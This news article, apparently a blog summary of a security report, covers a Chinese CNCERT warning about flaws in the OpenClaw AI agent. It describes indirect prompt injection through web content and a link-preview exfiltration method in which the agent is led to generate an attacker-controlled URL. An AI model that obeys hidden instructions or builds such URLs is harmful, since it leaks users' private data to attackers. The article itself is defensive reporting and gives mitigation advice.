CometSoul

make IT easy

  • Bahasa Indonesia
  • English

    • OpenClaw AI Agent Security Flaws Raise Risk of Prompt Injection and Data Theft

    by

    Juni Artawan
    in

    Security authorities in China have issued a warning about serious vulnerabilities in OpenClaw AI agent, an open-source and self-hosted autonomous artificial intelligence platform formerly known as Clawdbot and Moltbot. The China National Computer Network Emergency Response Technical Team (CNCERT) stated that weak default security settings and extensive system privileges could allow attackers to take control of affected machines.

    One of the most critical risks involves prompt injection attacks, where malicious instructions hidden in web content manipulate the AI agent into exposing sensitive information. This type of attack, known as indirect prompt injection or cross-domain prompt injection, does not target the language model directly. Instead, attackers exploit legitimate AI features such as web browsing, summarization, or content analysis to execute harmful commands.

    Link Preview Feature Can Leak Sensitive Data

    Researchers recently demonstrated that messaging apps with link preview features, such as Telegram and Discord, can be abused to extract confidential data from OpenClaw. In this attack scenario, the AI agent generates a specially crafted URL controlled by the attacker. When the link preview loads automatically, sensitive information may be transmitted to the attacker’s server without the user clicking the link.

    This form of data exfiltration can occur immediately after the AI agent responds, making it particularly dangerous for systems that process private or enterprise information.

    Additional Security Risks Identified

    CNCERT also highlighted several other threats associated with OpenClaw deployment:

    • Accidental deletion of critical data due to misinterpreted instructions
    • Malicious third-party “skills” that execute arbitrary commands or install malware
    • Exploitation of known vulnerabilities to gain system access

    For organizations in sensitive sectors such as finance and energy, these issues could result in data leaks, loss of intellectual property, or disruption of critical operations.

    Government Restrictions and Malware Campaigns

    Due to the potential risks, Chinese authorities have reportedly restricted government agencies and state-owned enterprises from running OpenClaw AI applications on office computers. The restriction is also said to extend to military personnel families.

    The growing popularity of OpenClaw has also attracted cybercriminals. Security researchers discovered malicious GitHub repositories disguised as OpenClaw installers that deploy information-stealing malware such as Atomic Stealer, Vidar Stealer, and the GhostSocks proxy malware. These repositories appeared in search results, making them more likely to trick users attempting to install the software.

    Security Recommendations

    Experts recommend several measures to reduce risk when using OpenClaw:

    • Restrict network access and avoid exposing management ports to the internet
    • Run the agent inside isolated containers
    • Avoid storing credentials in plain text
    • Install extensions or skills only from trusted sources
    • Disable automatic updates for third-party skills
    • Keep the platform updated with the latest security patches

    As AI agents become more capable of acting on behalf of users, security professionals warn that prompt injection and autonomous system abuse will become a major emerging threat in enterprise environments.

    Source: https://thehackernews.com/2026/03/openclaw-ai-agent-flaws-could-enable.html